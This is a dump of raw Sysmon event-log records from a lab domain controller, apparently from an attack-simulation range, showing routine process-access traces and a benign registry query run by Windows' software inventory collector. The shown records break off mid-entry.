10341000x80000000000000003243Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003242Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003241Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003240Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003239Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003238Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003237Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003236Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003235Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-857E-5FCF-9B00-000000009101}5032C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003234Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.039{10ACEC4A-857E-5FCF-9A00-000000009101}34523456C:\Windows\system32\cmd.exe{10ACEC4A-857E-5FCF-9B00-000000009101}5032C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003233Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.040{10ACEC4A-857E-5FCF-9B00-000000009101}5032C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{10ACEC4A-857E-5FCF-9A00-000000009101}3452C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000003232Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-857D-5FCF-9900-000000009101}47844804C:\Windows\system32\conhost.exe{10ACEC4A-857E-5FCF-9A00-000000009101}3452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003231Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003230Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003229Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003228Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003227Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003226Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003225Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003224Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003223Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003222Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-857E-5FCF-9A00-000000009101}3452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003221Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.024{10ACEC4A-857D-5FCF-9800-000000009101}47724780C:\Windows\system32\cmd.exe{10ACEC4A-857E-5FCF-9A00-000000009101}3452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003220Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:06.031{10ACEC4A-857E-5FCF-9A00-000000009101}3452C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-857D-5FCF-9800-000000009101}4772C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000003444Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-857E-5FCF-9D00-000000009101}49404980C:\Windows\system32\conhost.exe{10ACEC4A-857F-5FCF-A700-000000009101}4716C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003443Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003442Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:07.772{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003441Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 